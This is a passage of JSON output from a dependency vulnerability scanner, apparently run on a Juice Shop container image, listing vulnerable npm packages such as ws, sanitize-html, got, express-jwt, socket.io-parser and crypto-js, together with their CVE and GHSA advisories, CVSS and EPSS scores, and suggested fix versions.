80b3ff081989479ed93377e","https://github.com/websockets/ws/commit/e55e5106f10fcbaac37cfa89759e4cc0d073a52c","https://github.com/websockets/ws/commit/eeb76d313e2a00dd5247ca3597bba7877d064a63","https://github.com/websockets/ws/issues/2230","https://github.com/websockets/ws/pull/2231","https://github.com/websockets/ws/security/advisories/GHSA-3h5v-q93c-6h6q","https://nodejs.org/api/http.html#servermaxheaderscount"],"description":"ws is an open source WebSocket client and server for Node.js. A request with a number of headers exceeding theserver.maxHeadersCount threshold could be used to crash a ws server. The vulnerability was fixed in ws@8.17.1 (e55e510) and backported to ws@7.5.10 (22c2876), ws@6.2.3 (eeb76d3), and ws@5.2.4 (4abd8f6). In vulnerable versions of ws, the issue can be mitigated in the following ways: 1. Reduce the maximum allowed length of the request headers using the --max-http-header-size=size and/or the maxHeaderSize options so that no more headers than the server.maxHeadersCount limit can be sent. 2. Set server.maxHeadersCount to 0 so that no limit is applied.","cvss":[{"source":"security-advisories@github.com","type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","metrics":{"baseScore":7.5,"exploitabilityScore":3.9,"impactScore":3.6},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2024-37890","epss":0.01346,"percentile":0.677,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2024-37890","cwe":"CWE-476","source":"security-advisories@github.com","type":"Secondary"}]}],"matchDetails":[{"type":"exact-direct-match","matcher":"javascript-matcher","searchedBy":{"language":"javascript","namespace":"github:language:javascript","package":{"name":"ws","version":"7.4.6"}},"found":{"vulnerabilityID":"GHSA-3h5v-q93c-6h6q","versionConstraint":">=7.0.0,<7.5.10 (semantic)"},"fix":{"suggestedVersion":"7.5.10"}}],"artifact":{"id":"pkg:npm/ws@7.4.6?package-id=670482146c83d660","name":"ws","version":"7.4.6","type":"npm","locations":[{"path":"/juice-shop/node_modules/engine.io/node_modules/ws/package.json","layerID":"sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed","accessPath":""}],"language":"javascript","licenses":["MIT"],"cpes":["cpe:2.3:a:ws_project:ws:7.4.6:*:*:*:*:node.js:*:*"],"purl":"pkg:npm/ws@7.4.6","upstreams":[]}},{"vulnerability":{"id":"GHSA-rjqq-98f6-6j3r","dataSource":"https://github.com/advisories/GHSA-rjqq-98f6-6j3r","namespace":"github:language:javascript","severity":"Medium","urls":["https://nvd.nist.gov/vuln/detail/CVE-2021-26539","https://github.com/apostrophecms/sanitize-html/pull/458","https://advisory.checkmarx.net/advisory/CX-2021-4308","https://github.com/apostrophecms/sanitize-html/blob/main/CHANGELOG.md#231-2021-01-22","https://github.com/apostrophecms/sanitize-html/commit/bdf7836ef8f0e5b21f9a1aab0623ae8fcd09c1da"],"description":"Improper Input Validation in sanitize-html","cvss":[{"type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N","metrics":{"baseScore":5.3,"exploitabilityScore":3.9,"impactScore":1.5},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2021-26539","epss":0.01953,"percentile":0.776,"date":"2026-06-16"}],"fix":{"versions":["2.3.1"],"state":"fixed","available":[{"version":"2.3.1","date":"2021-05-07","kind":"first-observed"}]},"advisories":[],"risk":1.005795},"relatedVulnerabilities":[{"id":"CVE-2021-26539","dataSource":"https://nvd.nist.gov/vuln/detail/CVE-2021-26539","namespace":"nvd:cpe","severity":"Medium","urls":["https://advisory.checkmarx.net/advisory/CX-2021-4308","https://github.com/apostrophecms/sanitize-html/blob/main/CHANGELOG.md#231-2021-01-22","https://github.com/apostrophecms/sanitize-html/pull/458"],"description":"Apostrophe Technologies sanitize-html before 2.3.1 does not properly handle internationalized domain name (IDN) which could allow an attacker to bypass hostname whitelist validation set by the \"allowedIframeHostnames\" option.","cvss":[{"source":"nvd@nist.gov","type":"Primary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N","metrics":{"baseScore":5.3,"exploitabilityScore":3.9,"impactScore":1.5},"vendorMetadata":{}},{"source":"nvd@nist.gov","type":"Primary","version":"2.0","vector":"AV:N/AC:L/Au:N/C:N/I:P/A:N","metrics":{"baseScore":5,"exploitabilityScore":10,"impactScore":2.9},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2021-26539","epss":0.01953,"percentile":0.776,"date":"2026-06-16"}]}],"matchDetails":[{"type":"exact-direct-match","matcher":"javascript-matcher","searchedBy":{"language":"javascript","namespace":"github:language:javascript","package":{"name":"sanitize-html","version":"1.4.2"}},"found":{"vulnerabilityID":"GHSA-rjqq-98f6-6j3r","versionConstraint":"<2.3.1 (semantic)"},"fix":{"suggestedVersion":"2.3.1"}}],"artifact":{"id":"pkg:npm/sanitize-html@1.4.2?package-id=5de04e7baabe2ecd","name":"sanitize-html","version":"1.4.2","type":"npm","locations":[{"path":"/juice-shop/node_modules/sanitize-html/package.json","layerID":"sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed","accessPath":""}],"language":"javascript","licenses":["MIT"],"cpes":["cpe:2.3:a:apostrophecms:sanitize-html:1.4.2:*:*:*:*:node.js:*:*","cpe:2.3:a:punkave:sanitize-html:1.4.2:*:*:*:*:node.js:*:*"],"purl":"pkg:npm/sanitize-html@1.4.2","upstreams":[]}},{"vulnerability":{"id":"GHSA-pfrx-2q88-qq97","dataSource":"https://github.com/advisories/GHSA-pfrx-2q88-qq97","namespace":"github:language:javascript","severity":"Medium","urls":["https://nvd.nist.gov/vuln/detail/CVE-2022-33987","https://github.com/sindresorhus/got/pull/2047","https://github.com/sindresorhus/got/compare/v12.0.3...v12.1.0","https://github.com/sindresorhus/got/commit/861ccd9ac2237df762a9e2beed7edd88c60782dc","https://github.com/sindresorhus/got/releases/tag/v11.8.5","https://github.com/sindresorhus/got/releases/tag/v12.1.0"],"description":"Got allows a redirect to a UNIX socket","cvss":[{"type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N","metrics":{"baseScore":5.3,"exploitabilityScore":3.9,"impactScore":1.5},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2022-33987","epss":0.01855,"percentile":0.76362,"date":"2026-06-16"}],"fix":{"versions":["11.8.5"],"state":"fixed","available":[{"version":"11.8.5","date":"2022-06-22","kind":"first-observed"}]},"advisories":[],"risk":0.9553250000000001},"relatedVulnerabilities":[{"id":"CVE-2022-33987","dataSource":"https://nvd.nist.gov/vuln/detail/CVE-2022-33987","namespace":"nvd:cpe","severity":"Medium","urls":["https://github.com/sindresorhus/got/compare/v12.0.3...v12.1.0","https://github.com/sindresorhus/got/pull/2047","https://github.com/sindresorhus/got/releases/tag/v11.8.5"],"description":"The got package before 12.1.0 (also fixed in 11.8.5) for Node.js allows a redirect to a UNIX socket.","cvss":[{"source":"nvd@nist.gov","type":"Primary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N","metrics":{"baseScore":5.3,"exploitabilityScore":3.9,"impactScore":1.5},"vendorMetadata":{}},{"source":"nvd@nist.gov","type":"Primary","version":"2.0","vector":"AV:N/AC:L/Au:N/C:N/I:P/A:N","metrics":{"baseScore":5,"exploitabilityScore":10,"impactScore":2.9},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2022-33987","epss":0.01855,"percentile":0.76362,"date":"2026-06-16"}]}],"matchDetails":[{"type":"exact-direct-match","matcher":"javascript-matcher","searchedBy":{"language":"javascript","namespace":"github:language:javascript","package":{"name":"got","version":"8.3.2"}},"found":{"vulnerabilityID":"GHSA-pfrx-2q88-qq97","versionConstraint":"<11.8.5 (semantic)"},"fix":{"suggestedVersion":"11.8.5"}}],"artifact":{"id":"pkg:npm/got@8.3.2?package-id=5bd1b0995776246c","name":"got","version":"8.3.2","type":"npm","locations":[{"path":"/juice-shop/node_modules/got/package.json","layerID":"sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed","accessPath":""}],"language":"javascript","licenses":["MIT"],"cpes":["cpe:2.3:a:got:got:8.3.2:*:*:*:*:*:*:*"],"purl":"pkg:npm/got@8.3.2","upstreams":[]}},{"vulnerability":{"id":"GHSA-mjxr-4v3x-q3m4","dataSource":"https://github.com/advisories/GHSA-mjxr-4v3x-q3m4","namespace":"github:language:javascript","severity":"Medium","urls":["https://nvd.nist.gov/vuln/detail/CVE-2021-26540","https://github.com/apostrophecms/sanitize-html/pull/460","https://advisory.checkmarx.net/advisory/CX-2021-4309","https://github.com/apostrophecms/sanitize-html/blob/main/CHANGELOG.md#232-2021-01-26"],"description":"Improper Input Validation in sanitize-html","cvss":[{"type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N","metrics":{"baseScore":5.3,"exploitabilityScore":3.9,"impactScore":1.5},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2021-26540","epss":0.01754,"percentile":0.74953,"date":"2026-06-16"}],"fix":{"versions":["2.3.2"],"state":"fixed","available":[{"version":"2.3.2","date":"2021-05-07","kind":"first-observed"}]},"advisories":[],"risk":0.9033100000000001},"relatedVulnerabilities":[{"id":"CVE-2021-26540","dataSource":"https://nvd.nist.gov/vuln/detail/CVE-2021-26540","namespace":"nvd:cpe","severity":"Medium","urls":["https://advisory.checkmarx.net/advisory/CX-2021-4309","https://github.com/apostrophecms/sanitize-html/blob/main/CHANGELOG.md#232-2021-01-26","https://github.com/apostrophecms/sanitize-html/pull/460"],"description":"Apostrophe Technologies sanitize-html before 2.3.2 does not properly validate the hostnames set by the \"allowedIframeHostnames\" option when the \"allowIframeRelativeUrls\" is set to true, which allows attackers to bypass hostname whitelist for iframe element, related using an src value that starts with \"/\\\\example.com\".","cvss":[{"source":"nvd@nist.gov","type":"Primary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N","metrics":{"baseScore":5.3,"exploitabilityScore":3.9,"impactScore":1.5},"vendorMetadata":{}},{"source":"nvd@nist.gov","type":"Primary","version":"2.0","vector":"AV:N/AC:L/Au:N/C:N/I:P/A:N","metrics":{"baseScore":5,"exploitabilityScore":10,"impactScore":2.9},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2021-26540","epss":0.01754,"percentile":0.74953,"date":"2026-06-16"}]}],"matchDetails":[{"type":"exact-direct-match","matcher":"javascript-matcher","searchedBy":{"language":"javascript","namespace":"github:language:javascript","package":{"name":"sanitize-html","version":"1.4.2"}},"found":{"vulnerabilityID":"GHSA-mjxr-4v3x-q3m4","versionConstraint":"<2.3.2 (semantic)"},"fix":{"suggestedVersion":"2.3.2"}}],"artifact":{"id":"pkg:npm/sanitize-html@1.4.2?package-id=5de04e7baabe2ecd","name":"sanitize-html","version":"1.4.2","type":"npm","locations":[{"path":"/juice-shop/node_modules/sanitize-html/package.json","layerID":"sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed","accessPath":""}],"language":"javascript","licenses":["MIT"],"cpes":["cpe:2.3:a:apostrophecms:sanitize-html:1.4.2:*:*:*:*:node.js:*:*","cpe:2.3:a:punkave:sanitize-html:1.4.2:*:*:*:*:node.js:*:*"],"purl":"pkg:npm/sanitize-html@1.4.2","upstreams":[]}},{"vulnerability":{"id":"GHSA-cgfm-xwp7-2cvr","dataSource":"https://github.com/advisories/GHSA-cgfm-xwp7-2cvr","namespace":"github:language:javascript","severity":"High","urls":["https://nvd.nist.gov/vuln/detail/CVE-2022-25887","https://github.com/apostrophecms/sanitize-html/pull/557","https://github.com/apostrophecms/sanitize-html/commit/b4682c12fd30e12e82fa2d9b766de91d7d2cd23c","https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-3008102","https://security.snyk.io/vuln/SNYK-JS-SANITIZEHTML-2957526"],"description":"Sanitize-html Vulnerable To REDoS Attacks","cvss":[{"type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","metrics":{"baseScore":7.5,"exploitabilityScore":3.9,"impactScore":3.6},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2022-25887","epss":0.01108,"percentile":0.61506,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2022-25887","cwe":"CWE-1333","source":"nvd@nist.gov","type":"Primary"}],"fix":{"versions":["2.7.1"],"state":"fixed","available":[{"version":"2.7.1","date":"2024-04-23","kind":"first-observed"}]},"advisories":[],"risk":0.831},"relatedVulnerabilities":[{"id":"CVE-2022-25887","dataSource":"https://nvd.nist.gov/vuln/detail/CVE-2022-25887","namespace":"nvd:cpe","severity":"High","urls":["https://github.com/apostrophecms/sanitize-html/commit/b4682c12fd30e12e82fa2d9b766de91d7d2cd23c","https://github.com/apostrophecms/sanitize-html/pull/557","https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-3008102","https://security.snyk.io/vuln/SNYK-JS-SANITIZEHTML-2957526"],"description":"The package sanitize-html before 2.7.1 are vulnerable to Regular Expression Denial of Service (ReDoS) due to insecure global regular expression replacement logic of HTML comment removal.","cvss":[{"source":"nvd@nist.gov","type":"Primary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","metrics":{"baseScore":7.5,"exploitabilityScore":3.9,"impactScore":3.6},"vendorMetadata":{}},{"source":"report@snyk.io","type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L","metrics":{"baseScore":5.3,"exploitabilityScore":3.9,"impactScore":1.5},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2022-25887","epss":0.01108,"percentile":0.61506,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2022-25887","cwe":"CWE-1333","source":"nvd@nist.gov","type":"Primary"}]}],"matchDetails":[{"type":"exact-direct-match","matcher":"javascript-matcher","searchedBy":{"language":"javascript","namespace":"github:language:javascript","package":{"name":"sanitize-html","version":"1.4.2"}},"found":{"vulnerabilityID":"GHSA-cgfm-xwp7-2cvr","versionConstraint":"<2.7.1 (semantic)"},"fix":{"suggestedVersion":"2.7.1"}}],"artifact":{"id":"pkg:npm/sanitize-html@1.4.2?package-id=5de04e7baabe2ecd","name":"sanitize-html","version":"1.4.2","type":"npm","locations":[{"path":"/juice-shop/node_modules/sanitize-html/package.json","layerID":"sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed","accessPath":""}],"language":"javascript","licenses":["MIT"],"cpes":["cpe:2.3:a:apostrophecms:sanitize-html:1.4.2:*:*:*:*:node.js:*:*","cpe:2.3:a:punkave:sanitize-html:1.4.2:*:*:*:*:node.js:*:*"],"purl":"pkg:npm/sanitize-html@1.4.2","upstreams":[]}},{"vulnerability":{"id":"GHSA-6g6m-m6h5-w9gf","dataSource":"https://github.com/advisories/GHSA-6g6m-m6h5-w9gf","namespace":"github:language:javascript","severity":"High","urls":["https://github.com/auth0/express-jwt/security/advisories/GHSA-6g6m-m6h5-w9gf","https://github.com/auth0/express-jwt/commit/7ecab5f8f0cab5297c2b863596566eb0c019cdef","https://nvd.nist.gov/vuln/detail/CVE-2020-15084"],"description":"Authorization bypass in express-jwt","cvss":[{"type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:N","metrics":{"baseScore":7.7,"exploitabilityScore":1.3,"impactScore":5.8},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2020-15084","epss":0.01059,"percentile":0.6002,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2020-15084","cwe":"CWE-285","source":"security-advisories@github.com","type":"Secondary"},{"cve":"CVE-2020-15084","cwe":"CWE-863","source":"nvd@nist.gov","type":"Primary"}],"fix":{"versions":["6.0.0"],"state":"fixed","available":[{"version":"6.0.0","date":"2021-03-30","kind":"first-observed"}]},"advisories":[],"risk":0.8048400000000001},"relatedVulnerabilities":[{"id":"CVE-2020-15084","dataSource":"https://nvd.nist.gov/vuln/detail/CVE-2020-15084","namespace":"nvd:cpe","severity":"Critical","urls":["https://github.com/auth0/express-jwt/commit/7ecab5f8f0cab5297c2b863596566eb0c019cdef","https://github.com/auth0/express-jwt/security/advisories/GHSA-6g6m-m6h5-w9gf"],"description":"In express-jwt (NPM package) up and including version 5.3.3, the algorithms entry to be specified in the configuration is not being enforced. When algorithms is not specified in the configuration, with the combination of jwks-rsa, it may lead to authorization bypass. You are affected by this vulnerability if all of the following conditions apply: - You are using express-jwt - You do not have **algorithms** configured in your express-jwt configuration. - You are using libraries such as jwks-rsa as the **secret**. You can fix this by specifying **algorithms** in the express-jwt configuration. See linked GHSA for example. This is also fixed in version 6.0.0.","cvss":[{"source":"nvd@nist.gov","type":"Primary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N","metrics":{"baseScore":9.1,"exploitabilityScore":3.9,"impactScore":5.2},"vendorMetadata":{}},{"source":"nvd@nist.gov","type":"Primary","version":"2.0","vector":"AV:N/AC:M/Au:N/C:N/I:P/A:N","metrics":{"baseScore":4.3,"exploitabilityScore":8.6,"impactScore":2.9},"vendorMetadata":{}},{"source":"security-advisories@github.com","type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:N","metrics":{"baseScore":7.7,"exploitabilityScore":1.3,"impactScore":5.8},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2020-15084","epss":0.01059,"percentile":0.6002,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2020-15084","cwe":"CWE-285","source":"security-advisories@github.com","type":"Secondary"},{"cve":"CVE-2020-15084","cwe":"CWE-863","source":"nvd@nist.gov","type":"Primary"}]}],"matchDetails":[{"type":"exact-direct-match","matcher":"javascript-matcher","searchedBy":{"language":"javascript","namespace":"github:language:javascript","package":{"name":"express-jwt","version":"0.1.3"}},"found":{"vulnerabilityID":"GHSA-6g6m-m6h5-w9gf","versionConstraint":"<=5.3.3 (semantic)"},"fix":{"suggestedVersion":"6.0.0"}}],"artifact":{"id":"pkg:npm/express-jwt@0.1.3?package-id=b057e452c5702954","name":"express-jwt","version":"0.1.3","type":"npm","locations":[{"path":"/juice-shop/node_modules/express-jwt/package.json","layerID":"sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed","accessPath":""}],"language":"javascript","licenses":["MIT"],"cpes":["cpe:2.3:a:auth0:express-jwt:0.1.3:*:*:*:*:node.js:*:*"],"purl":"pkg:npm/express-jwt@0.1.3","upstreams":[]}},{"vulnerability":{"id":"GHSA-xc6g-ggrc-qq4r","dataSource":"https://github.com/advisories/GHSA-xc6g-ggrc-qq4r","namespace":"github:language:javascript","severity":"Medium","urls":["https://nvd.nist.gov/vuln/detail/CVE-2017-16016","https://github.com/punkave/sanitize-html/issues/100","https://github.com/punkave/sanitize-html/commit/5d205a1005ba0df80e21d8c64a15bb3accdb2403)))","https://npmjs.com/package/sanitize-html#discarding-the-entire-contents-of-a-disallowed-tag","https://www.npmjs.com/advisories/154","https://github.com/punkave/sanitize-html/commit/5d205a1005ba0df80e21d8c64a15bb3accdb2403"],"description":"Cross-Site Scripting in sanitize-html","cvss":[],"epss":[{"cve":"CVE-2017-16016","epss":0.01357,"percentile":0.67985,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2017-16016","cwe":"CWE-79","source":"support@hackerone.com","type":"Secondary"},{"cve":"CVE-2017-16016","cwe":"CWE-79","source":"nvd@nist.gov","type":"Primary"}],"fix":{"versions":["1.11.4"],"state":"fixed","available":[{"version":"1.11.4","date":"2021-03-30","kind":"first-observed"}]},"advisories":[],"risk":0.6785},"relatedVulnerabilities":[{"id":"CVE-2017-16016","dataSource":"https://nvd.nist.gov/vuln/detail/CVE-2017-16016","namespace":"nvd:cpe","severity":"Medium","urls":["https://github.com/punkave/sanitize-html/commit/5d205a1005ba0df80e21d8c64a15bb3accdb2403","https://github.com/punkave/sanitize-html/issues/100","https://nodesecurity.io/advisories/154"],"description":"Sanitize-html is a library for scrubbing html input of malicious values. Versions 1.11.1 and below are vulnerable to cross site scripting (XSS) in certain scenarios: If allowed at least one nonTextTags, the result is a potential XSS vulnerability.","cvss":[{"source":"nvd@nist.gov","type":"Primary","version":"3.0","vector":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N","metrics":{"baseScore":6.1,"exploitabilityScore":2.9,"impactScore":2.8},"vendorMetadata":{}},{"source":"nvd@nist.gov","type":"Primary","version":"2.0","vector":"AV:N/AC:M/Au:N/C:N/I:P/A:N","metrics":{"baseScore":4.3,"exploitabilityScore":8.6,"impactScore":2.9},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2017-16016","epss":0.01357,"percentile":0.67985,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2017-16016","cwe":"CWE-79","source":"support@hackerone.com","type":"Secondary"},{"cve":"CVE-2017-16016","cwe":"CWE-79","source":"nvd@nist.gov","type":"Primary"}]}],"matchDetails":[{"type":"exact-direct-match","matcher":"javascript-matcher","searchedBy":{"language":"javascript","namespace":"github:language:javascript","package":{"name":"sanitize-html","version":"1.4.2"}},"found":{"vulnerabilityID":"GHSA-xc6g-ggrc-qq4r","versionConstraint":"<=1.11.1 (semantic)"},"fix":{"suggestedVersion":"1.11.4"}}],"artifact":{"id":"pkg:npm/sanitize-html@1.4.2?package-id=5de04e7baabe2ecd","name":"sanitize-html","version":"1.4.2","type":"npm","locations":[{"path":"/juice-shop/node_modules/sanitize-html/package.json","layerID":"sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed","accessPath":""}],"language":"javascript","licenses":["MIT"],"cpes":["cpe:2.3:a:apostrophecms:sanitize-html:1.4.2:*:*:*:*:node.js:*:*","cpe:2.3:a:punkave:sanitize-html:1.4.2:*:*:*:*:node.js:*:*"],"purl":"pkg:npm/sanitize-html@1.4.2","upstreams":[]}},{"vulnerability":{"id":"GHSA-cqmj-92xf-r6r9","dataSource":"https://github.com/advisories/GHSA-cqmj-92xf-r6r9","namespace":"github:language:javascript","severity":"Medium","urls":["https://github.com/socketio/socket.io-parser/security/advisories/GHSA-cqmj-92xf-r6r9","https://github.com/socketio/socket.io-parser/commit/2dc3c92622dad113b8676be06f23b1ed46b02ced","https://github.com/socketio/socket.io-parser/commit/3b78117bf6ba7e99d7a5cfc1ba54d0477554a7f3","https://github.com/socketio/socket.io-parser/commit/1c220ddbf45ea4b44bc8dbf6f9ae245f672ba1b9","https://nvd.nist.gov/vuln/detail/CVE-2023-32695","https://github.com/socketio/socket.io-parser/releases/tag/4.2.3","https://github.com/socketio/socket.io-parser/commit/ee006607495eca4ec7262ad080dd3a91439a5ba4"],"description":"Insufficient validation when decoding a Socket.IO packet","cvss":[{"type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L","metrics":{"baseScore":7.3,"exploitabilityScore":3.9,"impactScore":3.4},"vendorMetadata":{}},{"type":"Secondary","version":"4.0","vector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N","metrics":{"baseScore":6.9},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2023-32695","epss":0.01051,"percentile":0.59742,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2023-32695","cwe":"CWE-20","source":"security-advisories@github.com","type":"Secondary"},{"cve":"CVE-2023-32695","cwe":"CWE-754","source":"nvd@nist.gov","type":"Primary"}],"fix":{"versions":["4.2.3"],"state":"fixed","available":[{"version":"4.2.3","date":"2023-05-24","kind":"first-observed"}]},"advisories":[],"risk":0.6358550000000001},"relatedVulnerabilities":[{"id":"CVE-2023-32695","dataSource":"https://nvd.nist.gov/vuln/detail/CVE-2023-32695","namespace":"nvd:cpe","severity":"High","urls":["https://github.com/socketio/socket.io-parser/commit/2dc3c92622dad113b8676be06f23b1ed46b02ced","https://github.com/socketio/socket.io-parser/commit/3b78117bf6ba7e99d7a5cfc1ba54d0477554a7f3","https://github.com/socketio/socket.io-parser/releases/tag/4.2.3","https://github.com/socketio/socket.io-parser/security/advisories/GHSA-cqmj-92xf-r6r9"],"description":"socket.io parser is a socket.io encoder and decoder written in JavaScript complying with version 5 of socket.io-protocol. A specially crafted Socket.IO packet can trigger an uncaught exception on the Socket.IO server, thus killing the Node.js process. A patch has been released in version 4.2.3.","cvss":[{"source":"nvd@nist.gov","type":"Primary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","metrics":{"baseScore":7.5,"exploitabilityScore":3.9,"impactScore":3.6},"vendorMetadata":{}},{"source":"security-advisories@github.com","type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L","metrics":{"baseScore":7.3,"exploitabilityScore":3.9,"impactScore":3.4},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2023-32695","epss":0.01051,"percentile":0.59742,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2023-32695","cwe":"CWE-20","source":"security-advisories@github.com","type":"Secondary"},{"cve":"CVE-2023-32695","cwe":"CWE-754","source":"nvd@nist.gov","type":"Primary"}]}],"matchDetails":[{"type":"exact-direct-match","matcher":"javascript-matcher","searchedBy":{"language":"javascript","namespace":"github:language:javascript","package":{"name":"socket.io-parser","version":"4.0.5"}},"found":{"vulnerabilityID":"GHSA-cqmj-92xf-r6r9","versionConstraint":">=4.0.4,<4.2.3 (semantic)"},"fix":{"suggestedVersion":"4.2.3"}}],"artifact":{"id":"pkg:npm/socket.io-parser@4.0.5?package-id=dd154d7bfbaea09c","name":"socket.io-parser","version":"4.0.5","type":"npm","locations":[{"path":"/juice-shop/node_modules/socket.io-parser/package.json","layerID":"sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed","accessPath":""}],"language":"javascript","licenses":["MIT"],"cpes":["cpe:2.3:a:socket:socket.io-parser:4.0.5:*:*:*:*:node.js:*:*"],"purl":"pkg:npm/socket.io-parser@4.0.5","upstreams":[]}},{"vulnerability":{"id":"GHSA-xwcq-pm8m-c4vf","dataSource":"https://github.com/advisories/GHSA-xwcq-pm8m-c4vf","namespace":"github:language:javascript","severity":"Critical","urls":["https://github.com/brix/crypto-js/security/advisories/GHSA-xwcq-pm8m-c4vf","https://github.com/brix/crypto-js/commit/421dd538b2d34e7c24a5b72cc64dc2b9167db40a","https://nvd.nist.gov/vuln/detail/CVE-2023-46233","https://lists.debian.org/debian-lts-announce/2023/11/msg00025.html"],"description":"crypto-js PBKDF2 1,000 times weaker than specified in 1993 and 1.3M times weaker than current standard","cvss":[{"type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N","metrics":{"baseScore":9.1,"exploitabilityScore":3.9,"impactScore":5.2},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2023-46233","epss":0.00635,"percentile":0.45497,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2023-46233","cwe":"CWE-328","source":"security-advisories@github.com","type":"Secondary"},{"cve":"CVE-2023-46233","cwe":"CWE-916","source":"security-advisories@github.com","type":"Secondary"},{"cve":"CVE-2023-46233","cwe":"CWE-327","source":"nvd@nist.gov","type":"Primary"}],"fix":{"versions":["4.2.0"],"state":"fixed","available":[{"version":"4.2.0","date":"2023-10-26","kind":"first-observed"}]},"advisories":[],"risk":0.574675},"relatedVulnerabilities":[{"id":"CVE-2023-46233","dataSource":"https://nvd.nist.gov/vuln/detail/CVE-2023-46233","namespace":"nvd:cpe","severity":"Critical","urls":["https://github.com/brix/crypto-js/commit/421dd538b2d34e7c24a5b72cc64dc2b9167db40a","https://github.com/brix/crypto-js/security/advisories/GHSA-xwcq-pm8m-c4vf","https://lists.debian.org/debian-lts-announce/2023/11/msg00025.html"],"description":"crypto-js is a JavaScript library of crypto standards. Prior to version 4.2.0, crypto-js PBKDF2 is 1,000 times weaker than originally specified in 1993, and at least 1,300,000 times weaker than current industry standard. This is because it both defaults to SHA1, a cryptographic hash algorithm considered insecure since at least 2005, and defaults to one single iteration, a 'strength' or 'difficulty' value specified at 1,000 when specified in 1993. PBKDF2 relies on iteration count as a countermeasure to preimage and collision attacks. If used to protect passwords, the impact is high. If used to generate signatures, the impact is high. Version 4.2.0 contains a patch for this issue. As a workaround, configure crypto-js to use SHA256 with at least 250,000 